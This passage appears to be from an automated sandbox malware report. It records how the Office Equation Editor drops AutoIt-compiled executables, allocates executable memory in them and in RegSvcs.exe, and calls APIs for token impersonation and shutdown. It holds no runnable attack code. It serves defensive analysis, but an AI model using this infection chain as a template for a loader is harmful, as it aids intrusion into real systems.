memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_e6e71942-0
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8a996c3d-f
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2f1f07c6-2
Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ef89f19f-6
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c6b2ebc5-6
Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_55d6bc35-1
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a04743ab-d
Source: negrett.exe.2.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b5ac6e26-5
Source: negrett.exe.2.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_bd6a790b-0
Source: name.exe.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_af25db20-4
Source: name.exe.5.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_bd7c0de8-2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Users\user\AppData\Roaming\negrett.exe Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\negrett.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105D5EB: CreateFileW,DeviceIoControl,CloseHandle, 8_2_0105D5EB
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01051201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_01051201
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 5_2_00B7E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_0105E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_0139E8F6
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029EA3AC 5_3_029EA3AC
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A061D9 5_3_02A061D9
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F0794 5_3_029F0794
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029D85C0 5_3_029D85C0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F0B06 5_3_029F0B06
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029EAB31 5_3_029EAB31
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F6E4A 5_3_029F6E4A
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F6C1B 5_3_029F6C1B
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F0DB0 5_3_029F0DB0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029D6D20 5_3_029D6D20
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029E8D7D 5_3_029E8D7D
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A092EE 5_3_02A092EE
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A5B244 5_3_02A5B244
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F1332 5_3_029F1332
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029DB340 5_3_029DB340
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F70A7 5_3_029F70A7
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F1077 5_3_029F1077
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A37698 5_3_02A37698
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A41446 5_3_02A41446
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029D7460 5_3_029D7460
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A05B6B 5_3_02A05B6B
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A0D8FF 5_3_02A0D8FF
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029FBEA0 5_3_029FBEA0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029DBEF0 5_3_029DBEF0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_02A63C73 5_3_02A63C73
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B18060 5_2_00B18060
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B82046 5_2_00B82046
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B78298 5_2_00B78298
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B4E4FF 5_2_00B4E4FF
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B4676B 5_2_00B4676B
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00BA4873 5_2_00BA4873
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B3CAA0 5_2_00B3CAA0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B1CAF0 5_2_00B1CAF0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B2CC39 5_2_00B2CC39
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B46DD9 5_2_00B46DD9
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00FF8060 8_2_00FF8060
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01062046 8_2_01062046
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01058298 8_2_01058298
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0102E4FF 8_2_0102E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0102676B 8_2_0102676B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01084873 8_2_01084873
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00FFCAF0 8_2_00FFCAF0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0101CAA0 8_2_0101CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01026DD9 8_2_01026DD9
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0100CC39 8_2_0100CC39
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0100B119 8_2_0100B119
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00FF91C0 8_2_00FF91C0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01011394 8_2_01011394
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01011706 8_2_01011706
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0100997D 8_2_0100997D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010119B0 8_2_010119B0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0101781B 8_2_0101781B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00FF7920 8_2_00FF7920
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01017A4A 8_2_01017A4A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01011C77 8_2_01011C77
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01017CA7 8_2_01017CA7
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01011F32 8_2_01011F32
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0107BE44 8_2_0107BE44
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01029EEE 8_2_01029EEE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_001936F0 8_2_001936F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00408C60 9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040DC11 9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00407C3F 9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00418CCC 9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00406CA0 9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004028B0 9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041A4BE 9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00418244 9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00401650 9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00402F20 9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004193C4 9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00418788 9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00402F89 9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00402B90 9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004073A0 9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_003D1560 9_2_003D1560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_003D1551 9_2_003D1551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_003D12B0 9_2_003D12B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_003D12C0 9_2_003D12C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A828F0 9_2_00A828F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82020 9_2_00A82020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8741A 9_2_00A8741A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A86858 9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8BDE1 9_2_00A8BDE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A81D30 9_2_00A81D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A84AB8 9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8828A 9_2_00A8828A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A856D8 9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82600 9_2_00A82600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A81A40 9_2_00A81A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A83FE0 9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82BE0 9_2_00A82BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8B720 9_2_00A8B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82310 9_2_00A82310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A80F48 9_2_00A80F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A828E4 9_2_00A828E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82010 9_2_00A82010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A825F1 9_2_00A825F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A81D20 9_2_00A81D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8F6D1 9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8EE21 9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8F279 9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A85FA4 9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8AF89 9_2_00A8AF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8AF98 9_2_00A8AF98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A863F8 9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82BD0 9_2_00A82BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A83FD4 9_2_00A83FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8FB29 9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A80F39 9_2_00A80F39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A82300 9_2_00A82300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A8B71F 9_2_00A8B71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00A85B47 9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2E6E0 9_2_00D2E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2C6E8 9_2_00D2C6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2C080 9_2_00D2C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2D3A8 9_2_00D2D3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2F3A8 9_2_00D2F3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2CD48 9_2_00D2CD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2ED48 9_2_00D2ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2E078 9_2_00D2E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2DA10 9_2_00D2DA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D24A18 9_2_00D24A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D265D0 9_2_00D265D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2E6D0 9_2_00D2E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2ABD8 9_2_00D2ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D2C6D8 9_2_00D2C6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D245C0 9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D272C8 9_2_00D272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D208F0 9_2_00D208F0
